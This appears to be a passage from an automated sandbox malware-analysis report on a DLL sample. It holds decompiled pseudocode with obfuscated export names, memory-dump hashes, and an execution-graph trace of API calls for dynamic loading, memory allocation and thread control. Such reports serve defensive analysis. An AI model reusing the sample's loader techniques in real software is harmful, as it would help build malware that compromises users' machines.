              • Part of subcall function 6D50768E: SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
              • Part of subcall function 6D50768E: Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D5039B2
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D503C34
              • Part of subcall function 6D50391B: VirtualAlloc.KERNEL32(00000000,?,?,00000004), ref: 6D503C97
            • SNifCw242OCD._RSR(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D51949A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressCw242Proc$AllocMqae01idVirtual
            • String ID: &$r(
            • API String ID: 1422986367-2886967036
            • Opcode ID: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction ID: 789f9c777a2ec3f8db38928147d4ba24ffb983072f7d79f474136505c6188d1c
            • Opcode Fuzzy Hash: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction Fuzzy Hash: F5F1EC726083419FE354CF68C984A5BFBE4FB88348F048A2DF5989B391D778E954CB52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 19%
            			E6D51A07D() {
            				intOrPtr _t61;
            				void* _t100;
            				signed int _t122;
            				intOrPtr _t123;
            				signed int _t124;
            				void* _t127;
            				intOrPtr _t128;
            				intOrPtr _t130;
            				intOrPtr _t131;
            				signed int _t134;
            				intOrPtr _t137;
            				intOrPtr _t140;
            				intOrPtr _t142;
            				intOrPtr _t143;
            				void* _t145;
            				void* _t147;
            
            				_t61 =  *((intOrPtr*)(_t147 + 0x48));
            				_t124 = _t61 - 0x252e;
            				_t130 =  *((intOrPtr*)(_t147 + 0x20)) + 0x2c4;
            				 *(_t147 + 0x50) = _t124;
            				_t122 = _t61 + 0x484;
            				_t140 =  *((intOrPtr*)(_t147 + 0x48)) + 0xffffe185;
            				 *((intOrPtr*)(_t147 + 0x14)) = _t130;
            				_t134 =  *((intOrPtr*)(_t147 + 0x44)) + 0xfffffc3c;
            				 *((intOrPtr*)(_t147 + 0x10)) = _t140;
            				_t145 =  *((intOrPtr*)(_t147 + 0x24)) + 0x56b;
            				 *(_t147 + 0x30) = _t134;
            				if(_t124 != _t130 + 0x616) {
            					if(_t140 > _t122 + 0x2de) {
            						_t142 =  *((intOrPtr*)(_t147 + 0x28));
            						if( *((intOrPtr*)(_t142 + 0x74)) <= ( *(_t142 + 0x168) ^  *(_t142 + 0x104) | _t122)) {
            							__imp__ActivateActCtx( *((intOrPtr*)(_t142 + 0x80)) + _t124,  *(_t142 + 0x48) &  *(_t142 + 0x130) & 0x0000ffff, _t124 & 0x00002ab3, ( *(_t142 + 0x130) -  *((intOrPtr*)(_t142 + 0xbc))) * 0x2ac3, _t145 - _t130);
            							_push(( *(_t142 + 0x4c) & _t122) + 0x2ac3);
            							_push(( *(_t142 + 0xd8) ^  *(_t142 + 0x5c)) -  *((intOrPtr*)(_t147 + 0x44)) + 0x6b3);
            							_push(_t134 ^ 0x0000252e);
            							ResumeThread( *(_t142 + 0x110) ^ 0x00001e7b);
            						}
            					} else {
            						_t143 =  *((intOrPtr*)(_t147 + 0x54));
            						_t137 =  *((intOrPtr*)(_t147 + 0x28));
            						_push(_t122 + 0x101);
            						_push(_t124 + 0x29d1);
            						_push( *((intOrPtr*)(_t147 + 0x58)) + 0x88);
            						_push(_t137);
            						_t19 = _t143 + 0x71f; // 0x6d50205b
            						_push( *((intOrPtr*)(_t147 + 0x24)) + 0x2749);
            						_push( *((intOrPtr*)(_t147 + 0x54)) + 0xfffffd25);
            						_push( *((intOrPtr*)(_t147 + 0x4c)) + 0x13c);
            						_t23 = _t143 + 0xfb7; // 0x6d5028f3
            						_push( *((intOrPtr*)(_t147 + 0x40)) + 0x345);
            						_t100 = E6D501986();
            						_t131 =  *((intOrPtr*)(_t147 + 0x38));
            						_t127 = _t100;
            						_push(_t145 - 0xc5);
            						_push(_t131 + 0x21e9);
            						_t29 = _t147 + 0x80; // 0x6d50205b
            						_t123 =  *_t29;
            						_push(_t122 - 0xbbf);
            						_push(_t123 + 0x73b);
            						_push(_t123 + 0x956);
            						_push(_t137);
            						_push(_t131 + 0x252e);
            						_t33 = _t127 - 0x606; // -1542
            						_push( *((intOrPtr*)(_t147 + 0x5c)) + 0xfffff9ce);
            						_push(_t123 + 0x7a4);
            						_t36 = _t127 + 0x1dd; // 0x1dd
            						_t128 =  *((intOrPtr*)(_t147 + 0x8c));
            						_t38 = _t143 + 0xbd5; // 0x6d502511
            						_push( *((intOrPtr*)(_t147 + 0xb0)) + 0x1df3);
            						_push(_t128 + 0x241);
            						_push(_t128 + 0x251);
            						_t42 = _t143 + 0x5bf; // 0x6d501efb
            						E6D51724F();
            						_t147 = _t147 + 0x68;
            						 *((intOrPtr*)(_t137 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x88)) + 0x1c)) + 0x1b061;
            					}
            				}
            				return  *((intOrPtr*)(_t147 + 0x4c));
            			}

            APIs
            • ActivateActCtx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6D50193C,?,?,?,?), ref: 6D51A235
            • ResumeThread.KERNEL32(?,?,?,?), ref: 6D51A26D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ActivateResumeThread
            • String ID: [ Pm
            • API String ID: 2475288038-2361217518
            • Opcode ID: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction ID: f36e8007d197fab6f30abf2e97706bcf3353a6a97da4c688237e00c97e0fcadc
            • Opcode Fuzzy Hash: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction Fuzzy Hash: 7E511872504605AFD711CB68CC85EDBB3ECFB88304F040A6AF99AD7241D735FA458B65
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:4.7%
            Dynamic/Decrypted Code Coverage:49.6%
            Signature Coverage:1.8%
            Total number of Nodes:2000
            Total number of Limit Nodes:80
20650->20672 20652 6d50c839 20652->20640 20653 6d50cc4a 20652->20653 20654 6d50c9bd __dosmaperr 5 API calls 20653->20654 20655 6d50cc71 20654->20655 20656 6d50cc8c TlsSetValue 20655->20656 20657 6d50cc80 20655->20657 20656->20657 20658 6d508b95 _ValidateLocalCookies 5 API calls 20657->20658 20659 6d50c84c 20658->20659 20660 6d50c713 20659->20660 20661 6d50c72e 20660->20661 20662 6d50c71e 20660->20662 20661->20640 20687 6d50c734 20662->20687 20670 6d50c9e9 20666->20670 20671 6d50c9ed __crt_fast_encode_pointer 20666->20671 20667 6d50ca0d 20669 6d50ca19 GetProcAddress 20667->20669 20667->20671 20669->20671 20670->20667 20670->20671 20679 6d50ca59 20670->20679 20671->20648 20673 6d508ba0 IsProcessorFeaturePresent 20672->20673 20674 6d508b9e 20672->20674 20676 6d508be2 20673->20676 20674->20652 20686 6d508ba6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20676->20686 20678 6d508cc5 20678->20652 20680 6d50ca7a LoadLibraryExW 20679->20680 20681 6d50ca6f 20679->20681 20682 6d50ca97 GetLastError 20680->20682 20683 6d50caaf 20680->20683 20681->20670 20682->20683 20684 6d50caa2 LoadLibraryExW 20682->20684 20683->20681 20685 6d50cac6 FreeLibrary 20683->20685 20684->20683 20685->20681 20686->20678 20688 6d50c74d 20687->20688 20689 6d50c747 20687->20689 20691 6d50b3fe ___free_lconv_mon 20 API calls 20688->20691 20690 6d50b3fe ___free_lconv_mon 20 API calls 20689->20690 20690->20688 20692 6d50c759 20691->20692 20693 6d50b3fe ___free_lconv_mon 20 API calls 20692->20693 20694 6d50c764 20693->20694 20695 6d50b3fe ___free_lconv_mon 20 API calls 20694->20695 20696 6d50c76f 20695->20696 20697 6d50b3fe ___free_lconv_mon 20 API calls 20696->20697 20698 6d50c77a 20697->20698 20699 6d50b3fe ___free_lconv_mon 20 API calls 20698->20699 20700 6d50c785 20699->20700 20701 6d50b3fe ___free_lconv_mon 20 API calls 20700->20701 20702 6d50c790 20701->20702 20703 6d50b3fe ___free_lconv_mon 20 API calls 20702->20703 20704 6d50c79b 20703->20704 20705 6d50b3fe 
___free_lconv_mon 20 API calls 20704->20705 20706 6d50c7a6 20705->20706 20707 6d50b3fe ___free_lconv_mon 20 API calls 20706->20707 20708 6d50c7b4 20707->20708 20719 6d50c5fa 20708->20719 20713 6d50b3fe 20714 6d50b432 __dosmaperr 20713->20714 20715 6d50b409 HeapFree 20713->20715 20714->20661 20715->20714 20716 6d50b41e 20715->20716 20829 6d50bf62 20716->20829 20725 6d50c506 20719->20725 20721 6d50c61e 20722 6d50c64a 20721->20722 20738 6d50c567 20722->20738 20724 6d50c66e 20724->20713 20726 6d50c512 ___scrt_is_nonwritable_in_current_image 20725->20726 20733 6d50c2f6 EnterCriticalSection 20726->20733 20728 6d50c546 20734 6d50c55b 20728->20734 20730 6d50c553 ___scrt_is_nonwritable_in_current_image 20730->20721 20731 6d50c51c 20731->20728 20732 6d50b3fe ___free_lconv_mon 20 API calls 20731->20732 20732->20728 20733->20731 20737 6d50c33e LeaveCriticalSection 20734->20737 20736 6d50c565 20736->20730 20737->20736 20739 6d50c573 ___scrt_is_nonwritable_in_current_image 20738->20739 20746 6d50c2f6 EnterCriticalSection 20739->20746 20741 6d50c57d 20747 6d50c7dd 20741->20747 20743 6d50c590 20751 6d50c5a6 20743->20751 20745 6d50c59e ___scrt_is_nonwritable_in_current_image 20745->20724 20746->20741 20748 6d50c7ec __fassign 20747->20748 20750 6d50c813 __fassign 20747->20750 20748->20750 20754 6d50f990 20748->20754 20750->20743 20828 6d50c33e LeaveCriticalSection 20751->20828 20753 6d50c5b0 20753->20745 20756 6d50fa10 20754->20756 20757 6d50f9a6 20754->20757 20758 6d50b3fe ___free_lconv_mon 20 API calls 20756->20758 20781 6d50fa5e 20756->20781 20757->20756 20761 6d50f9d9 20757->20761 20764 6d50b3fe ___free_lconv_mon 20 API calls 20757->20764 20759 6d50fa32 20758->20759 20760 6d50b3fe ___free_lconv_mon 20 API calls 20759->20760 20762 6d50fa45 20760->20762 20765 6d50b3fe ___free_lconv_mon 20 API calls 20761->20765 20780 6d50f9fb 20761->20780 20766 6d50b3fe ___free_lconv_mon 20 API calls 20762->20766 20763 6d50b3fe ___free_lconv_mon 20 API calls 20767 6d50fa05 20763->20767 20769 
6d50f9ce 20764->20769 20770 6d50f9f0 20765->20770 20771 6d50fa53 20766->20771 20772 6d50b3fe ___free_lconv_mon 20 API calls 20767->20772 20768 6d50facc 20773 6d50b3fe ___free_lconv_mon 20 API calls 20768->20773 20782 6d510d87 20769->20782 20810 6d510e85 20770->20810 20777 6d50b3fe ___free_lconv_mon 20 API calls 20771->20777 20772->20756 20778 6d50fad2 20773->20778 20775 6d50b3fe 20 API calls ___free_lconv_mon 20779 6d50fa6c 20775->20779 20777->20781 20778->20750 20779->20768 20779->20775 20780->20763 20822 6d50fb03 20781->20822 20783 6d510e81 20782->20783 20784 6d510d98 20782->20784 20783->20761 20785 6d510da9 20784->20785 20787 6d50b3fe ___free_lconv_mon 20 API calls 20784->20787 20786 6d510dbb 20785->20786 20788 6d50b3fe ___free_lconv_mon 20 API calls 20785->20788 20789 6d510dcd 20786->20789 20790 6d50b3fe ___free_lconv_mon 20 API calls 20786->20790 20787->20785 20788->20786 20791 6d510ddf 20789->20791 20792 6d50b3fe ___free_lconv_mon 20 API calls 20789->20792 20790->20789 20793 6d510df1 20791->20793 20795 6d50b3fe ___free_lconv_mon 20 API calls 20791->20795 20792->20791 20794 6d510e03 20793->20794 20796 6d50b3fe ___free_lconv_mon 20 API calls 20793->20796 20797 6d510e15 20794->20797 20798 6d50b3fe ___free_lconv_mon 20 API calls 20794->20798 20795->20793 20796->20794 20799 6d510e27 20797->20799 20800 6d50b3fe ___free_lconv_mon 20 API calls 20797->20800 20798->20797 20801 6d510e39 20799->20801 20803 6d50b3fe ___free_lconv_mon 20 API calls 20799->20803 20800->20799 20802 6d510e4b 20801->20802 20804 6d50b3fe ___free_lconv_mon 20 API calls 20801->20804 20805 6d510e5d 20802->20805 20806 6d50b3fe ___free_lconv_mon 20 API calls 20802->20806 20803->20801 20804->20802 20807 6d510e6f 20805->20807 20808 6d50b3fe ___free_lconv_mon 20 API calls 20805->20808 20806->20805 20807->20783 20809 6d50b3fe ___free_lconv_mon 20 API calls 20807->20809 20808->20807 20809->20783 20811 6d510e92 20810->20811 20821 6d510eea 20810->20821 20812 6d510ea2 20811->20812 20814 6d50b3fe 
___free_lconv_mon 20 API calls 20811->20814 20813 6d510eb4 20812->20813 20815 6d50b3fe ___free_lconv_mon 20 API calls 20812->20815 20816 6d510ec6 20813->20816 20817 6d50b3fe ___free_lconv_mon 20 API calls 20813->20817 20814->20812 20815->20813 20818 6d50b3fe ___free_lconv_mon 20 API calls 20816->20818 20819 6d510ed8 20816->20819 20817->20816 20818->20819 20820 6d50b3fe ___free_lconv_mon 20 API calls 20819->20820 20819->20821 20820->20821 20821->20780 20823 6d50fb10 20822->20823 20827 6d50fb2e 20822->20827 20824 6d510f2a __fassign 20 API calls 20823->20824 20823->20827 20825 6d50fb28 20824->20825 20826 6d50b3fe ___free_lconv_mon 20 API calls 20825->20826 20826->20827 20827->20779 20828->20753 20832 6d50c8d8 GetLastError 20829->20832 20833 6d50c8f1 20832->20833 20834 6d50c8f7 20832->20834 20835 6d50cbf4 __dosmaperr 11 API calls 20833->20835 20838 6d50c94e SetLastError 20834->20838 20851 6d50b523 20834->20851 20835->20834 20840 6d50b424 GetLastError 20838->20840 20839 6d50c911 20842 6d50b3fe ___free_lconv_mon 17 API calls 20839->20842 20840->20714 20841 6d50cc4a __dosmaperr 11 API calls 20843 6d50c926 20841->20843 20844 6d50c917 20842->20844 20843->20839 20845 6d50c92d 20843->20845 20847 6d50c945 SetLastError 20844->20847 20858 6d50c69a 20845->20858 20847->20840 20856 6d50b530 __dosmaperr 20851->20856 20852 6d50b570 20855 6d50bf62 __dosmaperr 19 API calls 20852->20855 20853 6d50b55b RtlAllocateHeap 20854 6d50b56e 20853->20854 20853->20856 20854->20839 20854->20841 20855->20854 20856->20852 20856->20853 20863 6d50e440 20856->20863 20874 6d50c672 20858->20874 20868 6d50e484 20863->20868 20865 6d508b95 _ValidateLocalCookies 5 API calls 20866 6d50e480 20865->20866 20866->20856 20867 6d50e456 20867->20865 20869 6d50e490 ___scrt_is_nonwritable_in_current_image 20868->20869 20870 6d50c2f6 _abort EnterCriticalSection 20869->20870 20871 6d50e49b 20870->20871 20872 6d50e4cd __dosmaperr LeaveCriticalSection 20871->20872 20873 6d50e4c2 ___scrt_is_nonwritable_in_current_image 
20872->20873 20873->20867 20880 6d50c5b2 20874->20880 20876 6d50c696 20881 6d50c5be ___scrt_is_nonwritable_in_current_image 20880->20881 20882 6d50c2f6 _abort EnterCriticalSection 20881->20882 20883 6d50c5c8 20882->20883 20884 6d50c5ee __dosmaperr LeaveCriticalSection 20883->20884 20885 6d50c5e6 ___scrt_is_nonwritable_in_current_image 20884->20885 20885->20876 20895 6d509768 20894->20895 20901 6d5084d6 20894->20901 20896 6d509776 20895->20896 20902 6d509a8e 20895->20902 20907 6d509ac8 20896->20907 20899 6d509786 20912 6d50973f 20899->20912 20901->20618 20916 6d5098f9 20902->20916 20904 6d509aa8 20905 6d509abf TlsGetValue 20904->20905 20906 6d509ab4 20904->20906 20905->20906 20906->20896 20908 6d5098f9 try_get_function 5 API calls 20907->20908 20909 6d509ae2 20908->20909 20910 6d509af1 20909->20910 20911 6d509afc TlsSetValue 20909->20911 20910->20899 20911->20910 20913 6d509749 20912->20913 20915 6d509756 20912->20915 20914 6d50b3fe ___free_lconv_mon 20 API calls 20913->20914 20913->20915 20914->20915 20915->20901 20918 6d509929 20916->20918 20920 6d50992d __crt_fast_encode_pointer 20916->20920 20917 6d50994d 20917->20920 20921 6d509959 GetProcAddress 20917->20921 20918->20917 20918->20920 20922 6d509999 20918->20922 20920->20904 20921->20920 20923 6d5099c1 LoadLibraryExW 20922->20923 20926 6d5099b6 20922->20926 20924 6d5099f5 20923->20924 20925 6d5099dd GetLastError 20923->20925 20924->20926 20927 6d509a0c FreeLibrary 20924->20927 20925->20924 20928 6d5099e8 LoadLibraryExW 20925->20928 20926->20918 20927->20926 20928->20924 20935 6d509791 20929->20935 20931 6d5084b2 20931->20627 20932 6d50b38b 20931->20932 20933 6d50c8d8 __dosmaperr 20 API calls 20932->20933 20934 6d5084be 20933->20934 20934->20630 20934->20631 20936 6d50979a 20935->20936 20937 6d50979d GetLastError 20935->20937 20936->20931 20938 6d509a8e ___vcrt_FlsGetValue 6 API calls 20937->20938 20939 6d5097b2 20938->20939 20940 6d5097d1 20939->20940 20941 6d509817 SetLastError 20939->20941 20942 6d509ac8 
___vcrt_FlsSetValue 6 API calls 20939->20942 20940->20941 20941->20931 20943 6d5097cb 20942->20943 20943->20940 20944 6d50b523 __dosmaperr 20 API calls 20943->20944 20945 6d5097df 20944->20945 20946 6d5097f3 20945->20946 20947 6d509ac8 ___vcrt_FlsSetValue 6 API calls 20945->20947 20948 6d509ac8 ___vcrt_FlsSetValue 6 API calls 20946->20948 20949 6d509807 20946->20949 20947->20946 20948->20949 20950 6d50b3fe ___free_lconv_mon 20 API calls 20949->20950 20950->20940 21190 6d5083d8 21191 6d5083e1 21190->21191 21192 6d5083e6 dllmain_dispatch 21190->21192 21194 6d50872b 21191->21194 21195 6d50875b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 21194->21195 21196 6d50874e 21194->21196 21197 6d508752 21195->21197 21196->21195 21196->21197 21197->21192 22848 27a26d8 22850 27a26e9 22848->22850 22854 27a2701 22848->22854 22856 27a7047 22850->22856 22853 27a9dc9 2 API calls 22855 27a271a 22853->22855 22879 27a2654 22854->22879 22857 27a7069 22856->22857 22858 27a7061 22856->22858 22859 27abfd9 2 API calls 22857->22859 22858->22854 22860 27a7072 22859->22860 22860->22858 22886 27b0eab 22860->22886 22863 27a8d86 2 API calls 22863->22858 22864 27a993a 7 API calls 22865 27a70c2 22864->22865 22865->22858 22866 27a66ae 5 API calls 22865->22866 22867 27a70d4 22866->22867 22868 27a70e1 22867->22868 22870 27a70f9 22867->22870 22869 27a8d86 2 API calls 22868->22869 22869->22858 22871 27a5bab 8 API calls 22870->22871 22878 27a7119 22870->22878 22875 27a7115 22871->22875 22872 27a8d86 2 API calls 22873 27a714b 22872->22873 22874 27a8d86 2 API calls 22873->22874 22876 27a708c 22874->22876 22877 27aac02 6 API calls 22875->22877 22875->22878 22876->22863 22877->22878 22878->22872 22880 27abfd9 2 API calls 22879->22880 22881 27a2665 22880->22881 22884 27a267c 22881->22884 22885 27a2689 22881->22885 22897 27aadcc 22881->22897 22883 27a8d86 2 API calls 22883->22885 22884->22883 22885->22853 22887 27b0eba 22886->22887 22888 27b0ef6 22886->22888 22890 
27a8d86 2 API calls 22887->22890 22896 27a8d70 RtlAllocateHeap 22888->22896 22891 27b0ec3 22890->22891 22892 27a8dd5 RtlAllocateHeap 22891->22892 22894 27a7086 22891->22894 22893 27b0eda 22892->22893 22893->22894 22895 27afc1c lstrlenW 22893->22895 22894->22864 22894->22876 22895->22894 22896->22891 22898 27aade8 6 API calls 22897->22898 22899 27aade3 22898->22899 22899->22884 21188 27a63de 21189 27a63ee ExitProcess 21188->21189 21633 6d50ebec 21634 6d50ebf9 21633->21634 21635 6d50b523 __dosmaperr 20 API calls 21634->21635 21636 6d50ec13 21635->21636 21637 6d50b3fe ___free_lconv_mon 20 API calls 21636->21637 21638 6d50ec1f 21637->21638 21639 6d50b523 __dosmaperr 20 API calls 21638->21639 21643 6d50ec45 21638->21643 21640 6d50ec39 21639->21640 21642 6d50b3fe ___free_lconv_mon 20 API calls 21640->21642 21642->21643 21644 6d50ec51 21643->21644 21645 6d50cca3 21643->21645 21646 6d50c9bd __dosmaperr 5 API calls 21645->21646 21647 6d50ccca 21646->21647 21648 6d50ccd3 21647->21648 21649 6d50cce8 InitializeCriticalSectionAndSpinCount 21647->21649 21650 6d508b95 _ValidateLocalCookies 5 API calls 21648->21650 21649->21648 21651 6d50ccff 21650->21651 21651->21643 18778 6d514181 18781 6d518f63 18778->18781 18795 6d506fc7 18781->18795 18783 6d519046 18805 6d50768e SNifCw242OCD Mqae01id 18783->18805 18789 6d519272 18790 6d5192a2 18789->18790 18791 6d51937f 18789->18791 18794 6d51418b 18789->18794 18828 6d5173b5 18790->18828 18793 6d5193aa SNifCw242OCD 18791->18793 18791->18794 18793->18791 18796 6d50704b 18795->18796 18804 6d507227 18795->18804 18856 6d506ce5 18796->18856 18802 6d5071d3 18884 6d504dfd 18802->18884 18804->18783 18951 6d513e64 18805->18951 18808 6d507953 18810 6d5143a4 SetEndOfFile 18808->18810 18812 6d50794b 18808->18812 18813 6d51a07d 2 API calls 18808->18813 18809 6d507881 18960 6d5029e2 18809->18960 18810->18808 18815 6d502ae5 18812->18815 18814 6d507b43 LeaveCriticalSection 18813->18814 18814->18808 18816 6d502c25 18815->18816 18817 6d502b48 18815->18817 
18820 6d502c78 18816->18820 18824 6d502c13 18816->18824 18974 6d518a58 18817->18974 18819 6d502b94 18984 6d5045c9 18819->18984 18990 6d506bba 18820->18990 18823 6d502e8e 18836 6d50391b 18823->18836 18824->18823 18825 6d502d1d 18824->18825 18825->18824 18826 6d506bba LoadLibraryA 18825->18826 18827 6d502e8b 18826->18827 18827->18823 18829 6d517457 18828->18829 18830 6d51742c 18828->18830 18829->18794 18831 6d5174d5 18830->18831 18832 6d517449 18830->18832 18831->18829 18833 6d518891 11 API calls 18831->18833 19004 27a8d5b HeapCreate 18832->19004 19005 27a65a7 18832->19005 18833->18829 18837 6d503993 18836->18837 18841 6d503b6e 18836->18841 18838 6d5039a1 GetProcAddress 18837->18838 18839 6d503a35 18837->18839 18838->18841 20603 6d515150 18839->20603 18842 6d503c27 GetProcAddress 18841->18842 18851 6d503f18 18841->18851 18843 6d503c7b VirtualAlloc 18842->18843 18855 6d503d79 18842->18855 18850 6d503ca3 18843->18850 18843->18855 18844 6d5041c2 18847 6d50226b 11 API calls 18844->18847 18845 6d504152 18846 6d506b43 2 API calls 18845->18846 18849 6d504186 18846->18849 18847->18849 18848 6d503ed5 GetPEB 18848->18851 18849->18789 18852 6d503ced ExitProcess 18850->18852 18854 6d503d46 VirtualAlloc 18850->18854 18851->18844 18851->18845 18854->18855 18855->18848 18855->18855 18857 6d506fb9 18856->18857 18858 6d506d79 18856->18858 18866 6d51a27e 18857->18866 18863 6d506ded 18858->18863 18892 6d5151f2 18858->18892 18859 6d506e70 18899 6d501000 18859->18899 18860 6d506f57 18865 6d506f7a EnterCriticalSection LeaveCriticalSection 18860->18865 18863->18859 18863->18860 18865->18857 18867 6d51a2f4 18866->18867 18874 6d51a350 18866->18874 18869 6d51a35a 18867->18869 18870 6d51a30e 18867->18870 18867->18874 18868 6d50226b 9 API calls 18873 6d51a498 18868->18873 18872 6d51a36b 18869->18872 18876 6d51a3d9 18869->18876 18933 6d504843 18870->18933 18872->18874 18875 6d51a376 EnterCriticalSection 18872->18875 18939 6d514f75 18873->18939 18874->18868 18875->18874 18876->18874 18878 
6d51a3ff OpenThread 18876->18878 18878->18874 18879 6d507137 18880 6d51a07d 18879->18880 18881 6d51a0d9 18880->18881 18882 6d51a0e7 18880->18882 18881->18882 18883 6d51a1ff ActivateActCtx ResumeThread 18881->18883 18882->18802 18883->18882 18885 6d504e68 18884->18885 18888 6d504f98 18884->18888 18886 6d515750 2 API calls 18885->18886 18887 6d504e9c 18886->18887 18890 6d5143a4 SetEndOfFile 18887->18890 18889 6d5151f2 11 API calls 18888->18889 18891 6d504f3c 18888->18891 18889->18888 18890->18891 18891->18804 18893 6d515270 18892->18893 18897 6d5152e7 18892->18897 18894 6d515282 18893->18894 18895 6d51541a 18893->18895 18894->18897 18908 6d504294 18894->18908 18895->18897 18898 6d515443 GetLastError 18895->18898 18897->18863 18898->18895 18900 6d501096 18899->18900 18903 6d5011a8 18899->18903 18912 6d5185cb 18900->18912 18907 6d5012d0 18903->18907 18915 6d50226b 18903->18915 18904 6d501151 GHQvB58h2E 18904->18857 18906 6d501289 CreateThread 18906->18903 18906->18907 18923 6d5143a4 18907->18923 18909 6d50432c 18908->18909 18910 6d50441d 18908->18910 18909->18897 18910->18909 18911 6d51a27e 11 API calls 18910->18911 18911->18910 18913 6d51881a CreateActCtxA 18912->18913 18914 6d5185f3 18912->18914 18913->18914 18914->18904 18914->18914 18916 6d5022ee 18915->18916 18921 6d5022f8 18915->18921 18917 6d50238b CreateFileA SetFilePointer 18916->18917 18916->18921 18918 6d5151f2 8 API calls 18917->18918 18919 6d50248f 18918->18919 18927 6d518891 18919->18927 18921->18906 18924 6d5143cb 18923->18924 18925 6d5143e0 18923->18925 18924->18925 18926 6d5144d5 SetEndOfFile 18924->18926 18925->18904 18926->18924 18928 6d5024ee SetEndOfFile 18927->18928 18929 6d51890f 18927->18929 18928->18921 18929->18928 18930 6d504294 11 API calls 18929->18930 18931 6d5189e2 18930->18931 18932 6d518891 11 API calls 18931->18932 18932->18928 18934 6d504980 18933->18934 18935 6d5048ae 18933->18935 18936 6d504916 18934->18936 18937 6d504988 DeleteCriticalSection 18934->18937 18945 6d515750 
18935->18945 18936->18874 18937->18936 18940 6d515092 18939->18940 18941 6d514fd2 18939->18941 18942 6d514fe0 18940->18942 18944 6d5150bb SNifCw242OCD 18940->18944 18941->18942 18943 6d515087 CloseHandle 18941->18943 18942->18879 18943->18942 18944->18942 18946 6d5157b0 18945->18946 18947 6d5157d4 GetProcessHeap 18946->18947 18950 6d5157cd ___scrt_fastfail 18946->18950 18948 6d51583f 18947->18948 18949 6d515868 RtlAllocateHeap 18948->18949 18948->18950 18949->18950 18950->18936 18952 6d513f17 18951->18952 18953 6d507850 18951->18953 18966 6d506b43 18952->18966 18953->18808 18953->18809 18953->18812 18956 6d513f56 18957 6d506b43 2 API calls 18956->18957 18957->18953 18958 6d513f7c 18958->18953 18970 6d516881 18958->18970 18961 6d502a11 18960->18961 18962 6d502a39 18960->18962 18963 6d506b43 2 API calls 18961->18963 18964 6d502a20 18962->18964 18965 6d502a6e ActivateActCtx 18962->18965 18963->18964 18964->18812 18965->18964 18965->18965 18967 6d506b63 GetProcessHeap 18966->18967 18969 6d506b7a 18966->18969 18968 6d506b70 RtlFreeHeap 18967->18968 18967->18969 18968->18969 18969->18953 18969->18956 18969->18958 18971 6d5168cf 18970->18971 18973 6d5168de 18970->18973 18972 6d506b43 2 API calls 18971->18972 18972->18973 18973->18958 18975 6d518ac6 18974->18975 18983 6d518ca5 18974->18983 18993 6d5050ec 18975->18993 18977 6d518bf1 VirtualAlloc 18979 6d518c2b ___scrt_fastfail 18977->18979 18978 6d518b3a 18978->18977 18978->18978 18980 6d518e09 18979->18980 18979->18983 18981 6d506bba LoadLibraryA 18980->18981 18982 6d518ea8 InitializeCriticalSection 18981->18982 18982->18983 18983->18819 18985 6d504610 18984->18985 18986 6d50467a 18984->18986 18999 6d505a34 18985->18999 18988 6d50462f 18986->18988 18989 6d5046a1 OpenThread 18986->18989 18988->18824 18989->18988 18991 6d506bfa LoadLibraryA 18990->18991 18992 6d506c2c 18990->18992 18991->18992 18992->18825 18992->18992 18994 6d505183 18993->18994 18997 6d5051a0 18993->18997 18995 6d506b43 2 API calls 18994->18995 
